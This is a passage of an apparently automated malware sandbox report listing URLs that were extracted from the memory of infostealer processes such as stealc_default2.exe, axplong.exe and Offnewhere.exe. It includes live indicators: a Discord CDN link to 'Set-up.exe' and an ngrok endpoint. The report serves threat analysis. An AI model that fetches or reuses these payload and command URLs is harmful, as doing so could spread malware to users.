Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: splwow64.exe, 00000013.00000002.2110940051.000000000041F000.00000004.00000001.01000000.0000000B.sdmp, splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: chrome.exe, 0000002B.00000002.2761492694.00002B3C00674000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000000.2135901294.0000000000349000.00000002.00000001.01000000.00000010.sdmp, EcoCraft.scr, 00000029.00000002.3749890554.00000000006A9000.00000002.00000001.01000000.00000017.sdmp, EcoCraft.scr, 0000002F.00000002.2543717342.00000000006A9000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: stealc_default2.exe, stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: stealc_default2.exe, 00000011.00000002.2208381556.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000002B.00000002.2760023286.00002B3C0041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2767632288.00002B3C009BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2769775665.00002B3C00AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/LogoutB
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSessionRL
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000002B.00000002.2704260602.00002B3C00104000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 0000002B.00000002.2704260602.00002B3C00104000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 0000002B.00000002.2704260602.00002B3C00104000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 0000002B.00000002.2768656437.00002B3C00A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: chrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/px
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001396000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.3755340826.000000000132E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1286706039475015741/1300800513197211749/Set-up.exe?ex=6722286
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/k
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761492694.00002B3C00674000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: chrome.exe, 0000002B.00000002.2771964516.00002B3C00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760983245.00002B3C005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2366929652.00002B3C00448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2371146012.00002B3C00EC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000002B.00000002.2760983245.00002B3C005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 0000002B.00000002.2762405730.00002B3C00694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2768656437.00002B3C00A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000002B.00000002.2771964516.00002B3C00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2366929652.00002B3C00448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2371146012.00002B3C00EC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000002B.00000002.2760983245.00002B3C005E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreez84gdRw=
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstorekgejglhpjiefppelpmljglcjbhoiplfn
Source: chrome.exe, 0000002B.00000003.2260377369.00002298006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000002B.00000003.2260377369.00002298006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000002B.00000002.2771681065.00002B3C00C50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/_B
Source: chrome.exe, 0000002B.00000003.2240743054.000037A8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2240774677.000037A8002E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000002B.00000002.2704121158.00002B3C000AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/c
